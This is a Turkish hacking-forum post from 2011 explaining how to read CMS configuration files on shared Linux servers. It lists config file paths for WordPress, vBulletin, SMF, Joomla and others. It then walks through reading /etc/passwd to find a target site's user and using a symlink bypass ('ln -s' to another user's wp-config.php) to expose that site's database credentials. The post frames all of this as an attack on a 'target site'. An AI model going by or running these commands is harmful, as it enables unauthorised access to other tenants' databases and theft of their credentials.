THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Linux Server'larda "config" okuma

Spy' Man
Spy' Man - ait Kullanıcı Resmi (Avatar)
Misafir
Mesajlar:
n/a
Konular:
14871
Teşekkür (Etti):
Teşekkür (Aldı):
Ticaret:
28-05-2011 14:15
#1
Linux Server'larda "config" okuma
Komut satırının açık olduğunu varsayıyorum..
İlk önce bulunduğumuz sitenin configini okumak istersek scriptine bakmalıyız (WORDPRESS ,VBULLETIN,SMF,PHPBB vs..)
Sitemizin smf olduğunu varsayıyorum.

/home/skeptical/public_html genellikle config bu bölümde olur.

Config yolları


Kod:
php nuke -> . /config.php vbulettin->. /includes/config.php mybb -> . /inc/config.php phpbb -> . /config.php smf -> Settings.php joomla -> configuration.php , configuration.php-dist wordpress -> wp-config.php seditio -> datas/config.php drupal sistem:/home/user/public_html/sites/default/settings.php setidio:/home/site/public_html/datas/config.php vbulletin: /home/site/public_html/includes/config.php vbulletin: /home/site/public_html/includes/class_core.php
Yani Smfnin = Settings.php dir.
Sonra dosya editleme satırına :
/home/skeptical/public_html/Settings.php yazarak içini görebilir okuyabilir ve SQL Bağlanabiliriz.

Gelelim şimdi hedef sitenin configini okumaya..Burda symlink bypass yöntemini kullanacağız..
Hedef sitemizin wordpress olduğunu sayıyorum..

Komut satırında :
Cat /etc/passwd yazarak hedef sitemizin kullanıcı adını buluyoruz..
Daha sonra tekrar komut satırına gelerek
Ln –s /home/hedef/public_html/wp-config.php die.txt

Yazıyoruz ve enterliyoruz.Enterlediğimizde eğer symlink bypass engelli değilse die.txt adında dosya oluşacaktır ve o dosyada hedef sitemizin configi ellerimizin altında olacaktır..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler